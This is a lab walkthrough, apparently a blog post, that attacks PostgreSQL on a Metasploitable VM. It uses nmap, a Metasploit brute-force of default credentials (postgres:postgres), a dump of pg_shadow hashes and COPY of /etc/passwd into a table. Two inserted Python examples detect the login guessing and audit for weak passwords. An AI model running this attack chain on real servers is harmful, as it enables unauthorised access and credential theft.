Okay, straight to the module. Let's kick ass!!!
root@bt:~# nmap 192.168.223.1-255
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-11-20 21:38 WIT
Nmap scan report for 192.168.223.1
Host is up (0.0000080s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
443/tcp open https
902/tcp open iss-realsecure
Nmap scan report for 192.168.223.128
Host is up (0.00090s latency).
Not shown: 988 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:72:06:C5 (VMware)
Nmap scan report for 192.168.223.254
Host is up (0.000052s latency).
All 1000 scanned ports on 192.168.223.254 are filtered
MAC Address: 00:50:56:E9:C3:C6 (VMware)
Nmap done: 255 IP addresses (3 hosts up) scanned in 10.44 seconds
[screenshot]
As the scan shows, we have a target with port 5432 open for PostgreSQL. Next, use nmap to find out more about the vulnerabilities that might be there.
root@bt:~# nmap -sS -sV -p 1-65535 -vv 192.168.223.128
Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-11-20 21:39 WIT
NSE: Loaded 11 scripts for scanning.
Initiating ARP Ping Scan at 21:39
Scanning 192.168.223.128 [1 port]
Completed ARP Ping Scan at 21:39, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:39
Completed Parallel DNS resolution of 1 host. at 21:39, 0.42s elapsed
Initiating SYN Stealth Scan at 21:39
Scanning 192.168.223.128 [65535 ports]
[snip...]
Nmap scan report for 192.168.223.128
Host is up (0.0018s latency).
Scanned at 2011-11-20 21:39:23 WIT for 16s
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
[snip...]
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:72:06:C5 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
Raw packets sent: 65787 (2.895MB) | Rcvd: 65536 (2.621MB)
[screenshot]
It is now confirmed that the target is indeed running PostgreSQL version 8.3 (=
Go ahead and open Metasploit, then look for a module that can attack PostgreSQL.
root@bt:~# msfconsole
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 764 exploits - 404 auxiliary - 118 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r14291 updated today (2011.11.20)
msf > search postgres
This command searches for modules related to PostgreSQL.
[screenshot]
After that, use the module: auxiliary/scanner/postgres/postgres_login
Then display the options available in this module:
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options
Then enter the configuration:
msf auxiliary(postgres_login) > set RHOSTS 192.168.223.128
RHOSTS => 192.168.223.128
Note the lines marked with a green + sign. Metasploit has successfully found a PostgreSQL login with:
[*] 192.168.223.128:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.223.128:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.223.128:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
Username = postgres
Password = postgres
Let's verify this by logging in to PostgreSQL
root@bt:~# psql -h 192.168.223.128 --username=postgres --password
You will then see:
Password for user postgres:
Enter the password found by Metasploit's dictionary attack, namely -> postgres
psql (8.4.8, server 8.3.1)
WARNING: psql version 8.4, server version 8.3.
Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
postgres=#
See, we're connected!
[screenshot]
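From the server side, the postgres_login run above shows up as a burst of FATAL "password authentication failed" lines from a single client, followed by an authorized connection once postgres:postgres hits. The detector below is an added example, not from the original post; it runs over a constructed log sample and assumes log_line_prefix = '%t %r ' with log_connections = on.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed PostgreSQL server log (not from the original post). Assumes log_line_prefix = '%t %r '
# (timestamp, then client host(port)) and log_connections = on. The burst from .130 is what the
# postgres_login run above looks like from the server side; the lone failure from .50 is a typo.
SAMPLE_LOG = """\
2011-11-20 21:44:01 WIT 192.168.223.130(51002) FATAL:  password authentication failed for user "postgres"
2011-11-20 21:44:01 WIT 192.168.223.130(51003) FATAL:  password authentication failed for user "admin"
2011-11-20 21:44:02 WIT 192.168.223.130(51004) FATAL:  password authentication failed for user "scott"
2011-11-20 21:44:02 WIT 192.168.223.130(51005) FATAL:  password authentication failed for user "tiger"
2011-11-20 21:44:03 WIT 192.168.223.130(51006) FATAL:  password authentication failed for user "postgres"
2011-11-20 21:44:03 WIT 192.168.223.130(51007) LOG:  connection authorized: user=postgres database=template1
2011-11-20 21:50:10 WIT 192.168.223.50(40211) FATAL:  password authentication failed for user "postgres"
"""
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ "  # %t, zone abbreviation skipped
    r"(?P<host>[\d.]+)\(\d+\) (?:FATAL|LOG):\s+(?P<msg>.*)$"
)
FAIL_PREFIX = 'password authentication failed for user "'

def detect_password_guessing(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_host: (total_failures, usernames_tried, later_success)} for clients with
    >= threshold failed logins inside any window-long span; later_success means the same client
    was authorized after its first failure, i.e. one of the guesses worked."""
    failures, authorized = defaultdict(list), defaultdict(list)  # host -> [(ts, user)] / [ts]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        if m["msg"].startswith(FAIL_PREFIX):
            failures[m["host"]].append((ts, m["msg"][len(FAIL_PREFIX):].rstrip('"')))
        elif m["msg"].startswith("connection authorized:"):
            authorized[m["host"]].append(ts)
    alerts = {}
    for host, events in failures.items():
        events.sort()
        start, peak = 0, 0
        for end, (ts, _) in enumerate(events):  # sliding window over time-ordered failures
            while ts - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            users = sorted({u for _, u in events})
            later_success = any(t >= events[0][0] for t in authorized[host])
            alerts[host] = (len(events), users, later_success)
    return alerts
```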
Success! So what's next? Let's try to grab every password on the system!
postgres=# \d pg_ ###PRESS TAB TWICE###
Display all 152 possibilities? (y or n)
This lists all the pg_ catalog objects ->
[screenshot]
Notice pg_catalog. with a "." after it, which lets you address the relations inside it. Now let's look at the pg_shadow relation inside pg_catalog.
postgres=# \d pg_catalog.pg_shadow
View "pg_catalog.pg_shadow"
Column | Type | Modifiers
-------------+---------+-----------
usename | name |
usesysid | oid |
usecreatedb | boolean |
usesuper | boolean |
usecatupd | boolean |
passwd | text |
valuntil | abstime |
useconfig | text[] |
View definition:
SELECT pg_authid.rolname AS usename, pg_authid.oid AS usesysid, pg_authid.rolcreatedb AS usecreatedb, pg_authid.rolsuper AS usesuper, pg_authid.rolcatupdate AS usecatupd, pg_authid.rolpassword AS passwd, pg_authid.rolvaliduntil::abstime AS valuntil, pg_authid.rolconfig AS useconfig
FROM pg_authid
WHERE pg_authid.rolcanlogin;
[screenshot]
To dump it:
postgres=# SELECT * FROM pg_shadow;
[screenshot]
Next, run these queries to view the shadow entries in full:
First, confirm which database we are using:
postgres=# SELECT current_database();
current_database
------------------
postgres
(1 row)
[screenshot]
Then we create our own table and load the password file into it:
postgres=# CREATE TABLE bluedragon (input TEXT); COPY bluedragon FROM '/etc/passwd'; SELECT input FROM bluedragon;
The result:
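Both dumps above, pg_shadow and the COPY of /etc/passwd, rest on two things a DBA can check straight from pg_shadow: a guessable password on a login role, and superuser privilege, since on 8.3 only a superuser can COPY from a server-side file. The audit below is an added example, not from the original post; pg_md5, SAMPLE_PG_SHADOW and DEFAULT_PASSWORDS are assumed names and the rows are constructed.

```python
import hashlib

def pg_md5(password, username):
    """The classic stored-password form seen in pg_shadow.passwd on the 8.3 server above:
    'md5' + md5(password || username). Hypothetical helper, not a libpq call."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()

# Constructed rows shaped like SELECT usename, usesuper, passwd FROM pg_shadow (not the post's
# real dump). Hashes are built with pg_md5 so the example runs offline.
SAMPLE_PG_SHADOW = [
    ("postgres",  True,  pg_md5("postgres", "postgres")),          # password == username, the post's finding
    ("appuser",   True,  pg_md5("k3Qv!9zLw#2011", "appuser")),     # strong password, but needlessly superuser
    ("reporting", False, pg_md5("Rd0nly-Quarter-Stats", "reporting")),
    ("legacy",    False, None),                                     # NULL passwd: no password at all
    ("batch",     False, "Summer2011"),                             # stored in cleartext (password_encryption = off)
]

# Defaults worth checking beyond "password equals username"; 'postgres' is the one the post hit.
DEFAULT_PASSWORDS = ("postgres", "password")

def audit_pg_shadow(rows):
    """Return [(usename, finding)] for every row that reproduces a weakness the post exploits:
    a guessable password, no password, a cleartext password, or superuser privilege
    (which is what lets COPY ... FROM '/etc/passwd' read server files)."""
    findings = []
    for usename, usesuper, passwd in rows:
        if passwd is None:
            findings.append((usename, "no password set; access rests entirely on pg_hba.conf"))
        elif not passwd.startswith("md5"):
            findings.append((usename, "password stored in cleartext"))
        else:
            for guess in (usename,) + DEFAULT_PASSWORDS:
                if pg_md5(guess, usename) == passwd:
                    findings.append((usename, f"guessable password '{guess}'"))
                    break
        if usesuper:
            findings.append((usename, "superuser: can read server files with COPY ... FROM"))
    return findings
```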
Creative:
blue-dragon & red-dragon